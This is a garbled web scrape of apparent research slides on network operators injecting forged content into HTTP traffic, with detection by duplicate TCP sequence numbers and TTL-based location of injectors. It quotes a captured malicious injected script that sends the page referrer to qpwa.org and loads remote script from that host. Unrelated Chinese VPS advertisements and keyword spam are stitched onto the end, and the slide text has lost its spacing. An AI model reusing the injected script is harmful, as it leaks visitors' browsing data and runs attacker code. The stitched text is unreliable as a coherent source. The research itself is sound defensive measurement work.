WEBSITE-TARGETEDFALSECONTENTINJECTIONBYNETWORKOPERATORSGabiNakibly1,2,JaimeSchcolnik3andYossiRubin21Technion–IsraelInstituteoftechnology2Rafael–AdvancedDefenseSystemsltd.
3IDCHerzliyaKNOWNEVENTSOFWEBCONTENTALTERATIONSomeISPsinthepasthavebeenspottedalteringtheircustomers'traffic:CMACommunicationsin2013Comcastin2012Mediacomin2011WOW!
in2008….
RogueadvertisementHOWTHEPRACTICEOFCONTENTALTERATIONWASSTUDIEDSeveralworksstudiedandanalyzedthispracticeE.
g.
NetalyzrHowpastworkmonitoredtraffictounearthcontentalterations:HOWTRAFFICWASMONITOREDINOURSTUDYWHATISOUT-OF-BANDCONTENTALTERATIONIn-bandcontentalteration:Out-of-bandcontentalteration:OUT-OF-BANDINJECTION–MODUSOPERANDI250bytessq#=0100bytessq#=250150bytessq#=350ourmonitoringpoint150bytessq#=350OUT-OF-BANDINJECTIONDETECTIONForgedbytessq#=350Validbytessq#=350TCPinjectionhasoccurrediftherearetwopacketsthathave:IdenticalIPaddressesandportnumbers,IdenticalTCPsequencenumber,But,havedifferentpayload.
THEINJECTIONEVENTSWediscovered14differentgroupsofinjectionevents.
AlmostallofthemwereinjectionstoChinesewebsites.
7injectiongroupsaimedtoaddrogueadvertisementstothewebsite.
5ofinjectiongroupshassomesortofmaliciousintent.
2injectiongroupsaimedtosimplyblockcontent(howeverisitnotcensorshiprelated).
INJECTIONEXAMPLE#1Thisinjectiongroupaimstoinjectrogueadvertisements.
Thisistheclient'sHTTPrequest:GET/core.
phpshow=pic&t=zHTTP/1.
1User-Agent:Mozilla/5.
0(WindowsNT6.
1;WOW64)Host:c.
cnzz.
comAccept-Encoding:gzipReferer:http://tfkp.
com/INJECTIONEXAMPLE#1(CONT.
)ThevalidHTTPresponse:TheinjectedHTTPresponse:HTTP/1.
1200OKServer:TengineContent-Type:application/javascriptContent-Length:762Connection:keep-aliveDate:Tue,07Jul201504:54:08GMTLast-Modified:Tue,07Jul201504:54:08GMTExpires:Tue,07Jul201505:09:08GMT!
function(){varp,q,r,a=encodeURIComponent,c=.
.
.
HTTP/1.
1302FoundConnection:closeContent-Length:0Location:http://adcpc.
899j.
com/google/google.
jsINJECTIONEXAMPLE#2ThevalidHTTPresponse:HTTP/1.
1200OKServer:nginx/1.
4.
4Content-Type:text/javascript;charset=UTF-8Transfer-Encoding:chunkedVary:Accept-EncodingExpires:-1Cache-Control:no-store,private,post-check=0…Pragma:no-cacheP3P:CP="CURaADMaDEVaPSAoPSDoOURBUSUNIINT….
JiaTag:de2a570993d722c94……Content-Encoding:gzipTheforgedHTTPresponse:HTTP/1.
1200OKDate:May,28Mar201214:59:17GMTServer:Microsoft-IIS/6.
0X-Powered-By:ASP.
NETPragma:No-CacheContent-Length:145Cache-control:no-cacheJiaThisisaChinesecompanythatprovidesasocialsharingtoolbar.
Arequestforaresourceatjiathis.
comresultsinthefollowing:AredirectiontoBaiduwithsearchterm"UNIQLO"'GPWA'INJECTION'GPWA'INJECTIONGPWA–GamblingPortalWebmastersAssociation.
Itrunsacertificationprogramtogamblingsites.
AsitethatmeetsthecertificationstandardgetstoshowanGPWAseal.
Thereareabout2500GPWAapprovedgamblingsites.
http://certify.
gpwa.
org/seal/online.
casinocity.
com/'GPWA'INJECTIONTheclient'sHTTPrequestis:GET/script/europeansoccerstatistics.
com/HTTP/1.
1Host:certify.
gpwa.
orgConnection:keep-aliveAccept:*/*User-Agent:Mozilla/5.
0(WindowsNT6.
1;WOW64)AppleWebKit/537.
36(KHTML,likeGecko)Chrome/44.
0.
2403.
107Safari/537.
36Referer:http://europeansoccerstatistics.
com/Accept-Encoding:gzip,deflate,sdchAccept-Language:en-US,en;q=0.
8,he;q=0.
6'GPWA'INJECTION(CONT.
)Theinjectedresource.
Referstoqpwa.
orginsteadofgpwa.
org.
Thisisnotanattackbyanetworkoperator,butbyathirdpartywhoprobablycompromisedarouter.
Thevictimsoftheattackhasreportedlyhavebeenshownadsandspoofedaffiliatetags.
{vari=newImage();i.
src="http://qpwa.
org/q="+document.
referrer;l=localStorage;if((document.
referrer!
="")&&(document.
location.
hostname!
=document.
referrer.
split('/')[2])&&(!
l.
g)){c=document.
createElement('script');c.
src='http://certify.
qpwa.
org/script/'+document.
location.
hostname.
replace('www\.
','')+'/';document.
getElementsByTagName('head')[0].
appendChild(c)}l.
g=1;}WHOISBEHINDTHEINJECTIONSIngeneral,itisdifficulttounveiltheinjectingentitiesasthereisnoidentifyinginformationintheinjectedcontent.
wetriedtogetanindicationoftheiridentitybyidentifyingtheautonomoussystemfromwhichtheforgedpacketoriginated.
Sincetheinjectionswerenotreproducible,wecannotemploytheoft-usedtraceroute-likeproceduretolocatetheinjector.
WHOISBEHINDTHEINJECTIONS(CONT.
)Weusedaheuristicbasedontheforgedpacket'sIPTTLtotrackdownitssource.
ItisknownthatthedefaultinitialTTLvaluesofthemajoroperatingsystemsare32,64,128and255.
Iftheattackerusedoneofthosevalueswecancalculatehowmanyhopstheinjectedpackettraversed.
Forexample,ifaninjectedpacketarrivedattheclienthavingTTL=59,thenmostprobablyit'sinitialvaluewas64andittraversed5hops.
Giventhepathbetweentheserverandtheclientwecanpin-pointtheinjector'slocation.
ServerClientEstimatednumberofhopstraversedbytheforgedpacketPATHDETECTIONUSINGRIPEATLASHowever,wedonotknowwhatistheactualpathfromthewebservertotheuser.
Thereversepath(clienttoserver)canbetrace-routed,butInternetpathsarenotalwayssymmetric.
TosolvethisproblemweleveragedRIPEAtlas:AglobalnetworkofprobesthatmeasureInternetconnectivityandreachability.
UsingRIPEAtlaswetraceroutedthepathfromanodeintheASofthewebservertotheclient(whenthereisone).
Thisisstillanapproximationsincethatnodeinnottheactualwebserver.
THESUSPICIOUSAUTONOMOUSSYSTEMSOuranalysisindicatesthattheinjectorresideswithintheASoftheinjectedwebsite.
Usually2-5hopsawayfromthewebserver.
MostinjectionsaretriggeredfromChineseoperators.
CONCLUSIONSFollowingalarge-scalesurveyofInternettrafficwediscoveredthatnotonlyedgeISPsaltertrafficbutalsonon-edgenetworkoperatorsthataimtoincreasetheirrevenue.
Therewerenumerousincidentswithmaliciousintent.
Weproposeaclient-sidemitigationfortheattacksincaseHTTPScannotbeused.
Wepublishedsamplesoftheinjections.
LetBox此次促销依然是AMD Ryzen处理器+NVME硬盘+HDD大硬盘,以前是5TB月流量,现在免费升级到10TB月流量。另外还有返余额的活动,如果月付,月付多少返多少;如果季付或者半年付,返25%;如果年付,返10%。依然全部KVM虚拟化,可自定义ISO系统。需要大硬盘vps、大流量vps、便宜AMD VPS的朋友不要错过了。不过LetBox对帐号审核严格,最好注册邮箱和paypal帐号...
DiyVM是一家比较低调的国人主机商,成立于2009年,提供VPS主机和独立服务器租用等产品,其中VPS基于XEN(HVM)架构,数据中心包括香港沙田、美国洛杉矶和日本大阪等,CN2或者直连线路,支持异地备份与自定义镜像,可提供内网IP。本月商家最高提供5折优惠码,优惠后香港沙田CN2线路VPS最低2GB内存套餐每月仅50元起。香港(CN2)VPSCPU:2cores内存:2GB硬盘:50GB/R...
2021年各大云服务商竞争尤为激烈,因为云服务商家的竞争我们可以选择更加便宜的VPS或云服务器,这样成本更低,选择空间更大。但是,如果我们是建站用途或者是稳定项目的,不要太过于追求便宜VPS或便宜云服务器,更需要追求稳定和服务。不同的商家有不同的特点,而且任何商家和线路不可能一直稳定,我们需要做的就是定期观察和数据定期备份。下面,请跟云服务器网(yuntue.com)小编来看一下2021年国内/国...
acceptencoding为你推荐
大学生就业信息获取与信息分析设置media杭州市西湖区翠苑第四幼儿园智慧校园采购项目步骤ios齐鲁工业大学高水平学科建设专项联通iphone4iphone4想换联通的卡 是普通联通的卡都能开通3G么 还是得换联通3G卡 联通都有什么套餐 我是北京的谷歌sb为什么搜索SB第一个是google?谷歌sb为什么百度一搜SB是谷歌,谷歌一搜SB是百度?www.baidu.jp日本视频怎样看苹果5.1.1完美越狱ios5.1.1越狱后 好用的cydia软件源
查询域名 美国vps vps动态ip 日本动态vps 中文域名申请 最便宜虚拟主机 花生壳免费域名 贝锐花生壳域名 edis bash漏洞 512av iis安装教程 主机合租 最好看的qq空间 南昌服务器托管 java虚拟主机 三拼域名 e蜗牛 个人空间申请 坐公交投2700元 更多